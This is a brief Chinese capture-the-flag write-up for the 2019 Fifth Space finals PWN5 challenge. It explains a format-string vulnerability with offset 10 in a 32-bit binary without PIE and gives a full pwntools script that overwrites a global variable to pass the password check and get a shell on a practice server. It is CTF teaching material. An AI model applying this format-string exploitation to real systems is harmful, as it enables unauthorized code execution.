第五空间2019_决赛_PWN5
查看保护
开了canary和NX
23行有一个格式化字符串漏洞,测出偏移为10,32位程序的话直接用pwntools的工具fmtstr_payload,没有开pie,所以将unk_804c044这里给覆盖成自己想要的值,然后输入password就可以get_shell。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29518)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
data_addr = 0x804C044
offest = 10
p1 = fmtstr_payload(offest, {data_addr : 1})
r.recvuntil('your name:')
r.sendline(p1)
r.recvuntil('your passwd:')
r.sendline('1')
r.interactive()